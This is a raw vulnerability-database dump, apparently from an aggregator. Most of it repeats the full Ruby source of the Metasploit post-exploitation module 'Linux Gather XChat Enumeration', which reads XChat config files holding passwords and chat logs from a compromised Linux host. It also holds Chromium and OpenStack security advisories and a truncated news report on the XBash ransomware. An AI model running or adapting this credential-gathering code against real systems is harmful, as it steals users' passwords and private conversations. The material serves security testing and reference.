vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-12-31T06:01:29", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-01T09:59:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-01T09:59:18", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-01T09:59:18", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T02:16:54", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-20T02:16:54", "value": null}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-20T02:16:54", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T22:06:33", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-20T22:06:33", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-21T05:35:39", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-08-21T05:35:39", "differentElements": ["modified", "published"], "edition": 10}], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"suse": [{"lastseen": "2018-09-20T02:16:59", "references": ["https://bugzilla.suse.com/1108774"], "affectedPackage": [{"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "69.0.3497.100-71.1", "arch": "x86_64", "packageFilename": "chromedriver-69.0.3497.100-71.1.x86_64.rpm", "packageName": "chromedriver", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "69.0.3497.100-71.1", "arch": "x86_64", "packageFilename": "chromium-debugsource-69.0.3497.100-71.1.x86_64.rpm", "packageName": "chromium-debugsource", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "69.0.3497.100-71.1", "arch": "x86_64", "packageFilename": "chromium-debuginfo-69.0.3497.100-71.1.x86_64.rpm", "packageName": "chromium-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "69.0.3497.100-71.1", "arch": "x86_64", "packageFilename": "chromedriver-debuginfo-69.0.3497.100-71.1.x86_64.rpm", "packageName": "chromedriver-debuginfo", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "69.0.3497.100-71.1", "arch": "x86_64", "packageFilename": "chromium-69.0.3497.100-71.1.x86_64.rpm", "packageName": "chromium", "operator": "lt"}], "description": "This update for Chromium to version 69.0.3497.100 fixes the following\n issues:\n\n - Security relevant fixes from internal audits, fuzzing and other\n initiatives (boo#boo#1108774)\n\n", "edition": 1, "reporter": "Suse", "published": "2018-09-20T00:08:03", "title": "Security update for chromium (moderate)", "type": "suse", "enchantments": {"score": {"modified": "2018-09-20T02:16:59", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": [], "modified": "2018-09-20T00:08:03", "id": "OPENSUSE-SU-2018:2753-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-09/msg00039.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2018-09-19T19:56:55", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [], "description": "Red Hat OpenStack Platform provides the facilities for building, deploying and monitoring a private or public infrastructure-as-a-service (IaaS) cloud running on commonly available physical hardware.\n\nSecurity Fix(es):\n\n* openstack-rabbitmq-container: Insecure download of rabbitmq_clusterer during docker build (CVE-2018-14620)\n\nFor more details about the security issue, including the impact, a CVSS score, and other related information, refer to the CVE page listed in the References section.\n\nThe Red Hat OpenStack Platform container images have been updated to address security advisory/ies: RHSA-2018:2439, RHSA-2018:2482, RHSA-2018:2557.", "reporter": "RedHat", "published": "2018-09-19T21:36:53", "type": "redhat", "title": "(RHSA-2018:2729) Moderate: Red Hat Enterprise Linux OpenStack Platform security update", "enchantments": {"score": {"modified": "2018-09-19T19:56:55", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-10268", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10384", "CVE-2017-3636", "CVE-2017-3641", "CVE-2017-3651", "CVE-2017-3653", "CVE-2018-10892", "CVE-2018-10915", "CVE-2018-14620", "CVE-2018-2562", "CVE-2018-2622", "CVE-2018-2640", "CVE-2018-2665", "CVE-2018-2668", "CVE-2018-2755", "CVE-2018-2761", "CVE-2018-2767", "CVE-2018-2771", "CVE-2018-2781", "CVE-2018-2813", "CVE-2018-2817", "CVE-2018-2819"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-09-19T22:06:29", "id": "RHSA-2018:2729", "href": "https://access.redhat.com/errata/RHSA-2018:2729", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-09-19T15:47:47", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-ygWTdRbnRzg/W6JjJNYdGkI/AAAAAAAAyKs/X2RZmectQkccC3bodz1NnV9uBrk228m-gCLcBGAs/s728-e100/ransomware-coin-mining-botnet-hacking-malware.jpg>)\n\nWindows and Linux users need to beware, as an all-in-one, destructive malware strain has been discovered in the wild that features multiple malware capabilities including ransomware, cryptocurrency miner, botnet, and self-propagating worm targeting Linux and Windows systems. \n \nDubbed XBash, the new malware, believed to be tied to the Iron Group, a.k.a. Rocke\u2014the Chinese speaking APT threat actors group known for previous cyber attacks involving [ransomware](<https://thehackernews.com/2018/07/samsam-ransomware-attacks.html>) and [cryptocurrency miners](<https://thehackernews.com/2017/11/cryptocurrency-mining-javascript.html>). \n \nAccording to the researchers from security vendor Palo Alto Networks, who [uncovered](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/>) the malware, XBash is an all-in-one malware that features ransomware and cryptocurrency mining capabilities, as well as worm-like ability similar to [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) or Petya/[NotPetya](<https://thehackernews.com/2017/10/ukraine-notpetya-cyberattack.html>). \n \nIn addition to self-propagating capabilities, XBash also contains a functionality, which is not yet implemented, that could allow the malware to spread quickly within an organization's network. \n\n\n \nDeveloped in Python, XBash hunts for vulnerable or unprotected web services and deletes databases such as MySQL, PostgreSQL, and [MongoDB](<https://thehackernews.com/2017/01/secure-mongodb-database.html>) running on Linux servers, as part of its ransomware capabilities. \n \n\n\n## Important: Paying Ransom Will Get You Nothing!\n\n \nXbash has been designed to scan for services on a target IP, on both TCP and UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. \n \nOnce find an open port, the malware uses a weak username and password dictionary attack to brute force itself into the vulnerable service, and once in, deletes all the databases and then displays the ransom note. \n \nWhat's worrisome is that the malware itself does not contain any functionality that would allow the recovery of the deleted databases once a ransom amount has been paid by the victims. \n \nTo date, XBash has infected at least 48 victims, who have already paid the ransom, making about $6,000 to date for cybercriminals behind the threat. However, researchers see no evidence that the paid payments have resulted in the recovery of data for the victims. \n \nThe malware also has capabilities to add targeted Linux-based systems in a botnet. \n \n\n\n## XBash Malware Exploits Flaws in Hadoop, Redis, and ActiveMQ\n\n \nOn the other hand, XBash targets Microsoft Windows machines only for cryptocurrency mining and self-propagation. For self-propagation, it exploits three known vulnerabilities in Hadoop, Redis, and ActiveMQ: \n\n\n \n \n\n\n * Hadoop YARN ResourceManager unauthenticated command execution bug 